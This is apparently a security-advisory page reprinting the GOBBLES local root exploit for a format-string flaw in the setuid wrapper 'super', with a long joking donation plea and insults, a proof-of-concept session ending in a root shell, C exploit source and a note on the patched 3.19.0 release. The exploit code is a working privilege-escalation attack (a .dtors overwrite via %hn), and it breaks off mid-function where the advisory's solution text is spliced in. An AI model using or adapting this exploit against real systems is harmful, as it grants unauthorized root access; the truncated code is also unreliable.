|
COMMAND super overflow via syslog SYSTEMS AFFECTED ? PROBLEM GOBBLES says : /* * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES * * When GOBBLES say he and he security team * are non-profit. He really mean NON-profit. * This means GOBBLES and he GOBBLES Security * Labs (GSL) friends do not have much funds. * * GOBBLES was hoping to receive the money * for speaking at the defcon gathering of * security enthusiasts up front. So he could buy * and pay for he ticket to Las Vegas from the great city * of Baltimore where he currently resides. * * GOBBLES is not selling out. GOBBLES is just admitting that he * need your help. Please, help GOBBLES! * * After many e-mails to defcon organisers it became * apparent to GOBBLES this was not going to happen. * This mean GOBBLES has no way of getting to defcon. * This also mean GOBBLES cannot deliver he talk that * are named "Wolves among us". Alot of time and work * went into the preperation of this talk and it was * to be the grand finale of the year of the turkey * (2002). With many new 0-day to give out and many * great anouncements to be made. * * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) * you, the defcon attendee, may very well get cheated out * of attending one of the most provocative and daring * events defcon history has ever seen. * * !!! ITS NOT TOO LATE..BUT HURRY !!! * * Help GOBBLES go to defcon. GOBBLES give so much to * the community..is it not time the community now help * a poverty stricken turkey to spread his wings and fly * towards fame and glory? * * Reasons why you should help GOBBLES get to defcon: * * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper * * -- Seeing GOBBLES present naked: Priceless. * * -- Zeroday (possible hardcover) GOBBLES comic * * -- A chance to buy GOBBLES art * * -- A chance to receive _free_ GOBBLES T-shirts * * -- Copies of those exploits you couldn't code * * * What does GOBBLES need? * * Basically GOBBLES need to round up 300 US dollars before saturday. * "Wolves among us" is sheduled for the last day of defcon. * Namely 3PM on Sunday August 4th. As you can very well imagine * this talk was going to blow the lid off of more dirty secrets * than there are noodles in China. With your help GOBBLES can still * make this happen. So what GOBBLES is asking for is a little helping * hand from the community. If anyone has the funds to sponsor GOBBLES * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com. * * !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!! * * GOBBLES accepts Western Union payments. GOBBLES will not accept anything * beyond the amount needed for travel to Vegas and back. GOBBLES is not * selling out, GOBBLES is asking help from those penetrators and researchers * that GOBBLES helps every day. * * In other news, ISS rejected GOBBLES request for a job application. It * seems that they're afraid of getting scalp'd. * * Political statement: * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!! * * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM */ /* * GOBBLES-own-super.c * -- root exploit for root hole in root wrapper * * Super is sudo wannabe that boasts much security. * GOBBLES think people who write setuid wrappers * should learn to program securely before opening * big hoohoo about how secure program is. * * Current super version (3.18): -- ftp://ftp.ucolick.org/pub/users/will/ * * Super maintainer say following about he code: * * "Super allows an admin to control access to files * and functions for users. It is similar to sudo, but * uses a different approach in the configuration file." * * Problem: * * When super is compiled to use syslog(3) for its logging * of error messages the following lines makes pre-auth * local root exploitation rather trivial: * * From error.c * ... * #define SysLog(pri, buf) syslog((pri), (buf)) * ... * SysLog(error_priority, buf); * ... * * This means users that are not in the super config file * will be able to execute code with root priviledges. * * "Super acts as a SetUID wrapper around system commands * to make sure the commands are executed safely, and * only by authorized users." * * hehehe ;PPpPPPPp * * Love, * GOBBLES * GOBBLES@hushmail.com * * Official site: http://www.bugtraq.org * Official mirror: http://www.immunitysec.com/GOBBLES/ */ /* Proof Of Concept: $ gcc GOBBLES-own-super.c -o GOBBLES-own-super $ ./GOBBLES-own-super Usage: ./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ] $ objdump -s -j .dtors /usr/local/bin/super /usr/local/bin/super: file format elf32-i386 Contents of section .dtors: 8063f7c ffffffff 00000000 ........ $ ./GOBBLES-own-super -t 0x8063f7c . target @ 0x8063f80 . shellcode @ 0xbfffffb0 . username: 9 bytes super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'. sh-2.05# */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <pwd.h> #include <sys/types.h> #define ALLIGN 2 #define DPA 29 #define SUPER "/usr/local/bin/super" void buildstring(unsigned long t, unsigned long w, int dpa, int allign); void stuff(void); extern char **environ; char string[256]; int main(int argc, char **argv) { unsigned long t, w; int dpa, allign, shift = 0; char c, *store; if(argc == 1) { fprintf(stderr, "nUsage: n%s -t <.dtors address> [ -o <offset> -A <allignment> ]n", argv[0]); exit(0); } allign = ALLIGN; dpa = DPA; while((c = getopt(argc, argv, "t:o:A:")) != EOF) { switch(c) { case 't': sscanf(optarg, "%p", &store); t = (long)store; t += 4; break; case 'o': dpa = atoi(optarg); break; case 'A': allign = atoi(optarg); break; default: fprintf(stderr, "hehehe ;PPppPPPpn"); exit(0); } } store = NULL; if((store = getenv("GOBBLES")) == NULL) { stuff(); if(execve(argv[0], argv, environ)) { fprintf(stderr, ". problem re-executingn"); exit(1); } } w = (long)store; // shift is signed so this works both ways shift = (strlen(argv[0]) - strlen(SUPER)); w += shift; fprintf(stderr, ". target @ %pn. shellcode @ %pn", t, w); buildstring(t, w, dpa, allign); if(execl(SUPER, "super", string, NULL)) { fprintf(stderr, "error executingn"); exit(1); } } void buildstring(unsigned long t, unsigned long w, int dpa, int allign) { unsigned int un, deux, x, b[4], namelen; char a_buf[4]; struct passwd *pass; memset(string, ' SOLUTION Update (2 August 2002) ====== William Deich says the patched version is available at ftp://ftp.ucolick.org/pub/users/will/super-3.19.0.tar.gz